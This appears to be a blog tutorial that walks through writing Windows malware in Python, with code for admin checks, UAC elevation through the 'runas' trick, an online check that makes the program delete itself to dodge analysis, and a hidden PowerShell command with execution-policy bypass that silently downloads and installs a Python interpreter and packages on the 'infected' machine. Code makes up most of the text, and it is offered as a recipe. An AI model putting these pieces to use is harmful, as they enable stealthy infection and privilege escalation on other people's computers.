Introduction
In this article, I’ll describe how to write a malware, Please notice this is not a “true” malware this is only has to show
you the basics and even how easy to be written, Probably python is not the best choice at all, It’s an interpreted language and so it needs an interpreter to be executed so to write a malware probably other languages that can work to a lower level and that can be compiled are probably a better choice, malware is often designed to be small, stealthy, have low memory footprint, and use limited processing power.
So it’s very common to see malware written in C & Assembly.
Overview
At first, I will show its code then I will describe generally how this malware works, code consisted of two components: we are talking only about windows, The techniques you gone see in this malware are taken from a public malware samples.
The First function IsAdmin
def IsAdmin():
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
it checks if it has Administrator privileges, if it doesn’t it runs RunAsAdmin using the ShellExecute trick runas to elevate
privileges, and exits immediately
def RunAsAdmin():
ctypes.windll.shell32.IsUserAnAdmin() or (ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv), None, 1) > 32, sys.exit())
Is64Bit
def Is64Bit():
return platform.machine().endswith('64')
it just check if the current process is a 64-bit using platform lib this function it’s gone be called later in InstallPy to determine which version of python should be installed, a simple if statement.
os_p = 64
if not Is64Bit():
os_p = 32
IsOnline This function simply checks if the infected computer is online using the “request” lib to get an HTTP response If TRUE, pass if not, the program will delete it itself why? Desperate ways to avoid analysis and we don’t want to infect a dead computer 😉
def IsOnline():
try:
x = requests.get('https://google.com', verify=False)
return True
except:
return False
Interpreter
IsPyExist Here I am using os.path.exists to see if python path exist in infected computer this can be done also by using subprocess to execute powershell cmd to check the version of python this way we can tell if python is present on the infected computer or not.
p = subprocess.run(['powershell',
"""$p = &{python -V} 2>&1;$version = if($p -is [System.Management.Automation.ErrorRecord]){$p.Exception.Message}; $p"""],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True, startupinfo=startupinfo)
p.stdout.decode()
return True
for num in range(10, 45):
if os.path.exists(f"C:/Users/{os.getlogin()}/Appdata/Local/Programs/Python/Python{num}/python.exe"):
return True
return False
InstallPy The goal of this function is to install Python on the infected machine. The key is that we are installing our interpreter using a language that is already built into Windows.
def InstallPy():
os_p = 64
if not Is64Bit():
os_p = 32
rand_py = f'python{random.randrange(111, 9999999)}.exe'
url = "https://www.python.org/ftp/python/3.8.1/python-3.8.1-amd64.exe" if os_p == 64 else "https://www.python.org/ftp/python/3.8.1/python-3.8.1.exe"
subprocess.run(
f"""powershell -ep Bypass -WindowStyle Hidden -Command "iwr -Uri {url} -OutFile c:/users/$env:username/appdata/local/temp/{rand_py}" """)
if os.path.exists(f"c:/users/{os.getlogin()}/appdata/local/temp/{rand_py}"):
subprocess.run(
f"c:/users/{os.getlogin()}/appdata/local/temp/{rand_py} /quiet InstallAllUsers=0 Include_launcher=0 PrependPath=1 Include_test=0")
os.remove(f"c:/users/{os.getlogin()}/appdata/local/temp/{rand_py}")
subprocess.run("python -m pip install --upgrade pip")
subprocess.run("python -m pip install pyinstaller psutil")
pip_list = RunPwsh("pip list")
if 'psutil' in pip_list.lower():
wait4 = os.system('msg %username% in!')
subprocess.run("msg %username% finished")
return True
PowerShell -WindowStyle Hidden
will hide the window.
-ExecutionPolicy Bypass
should already do the run as admin part
iwr -Uri Invoke-WebRequest
It parses the response and returns collections of links,
The {url} will automatically download no need for user interaction -OutFile output python exe to temp directory under a random name using {rand_py}
Top comments (0)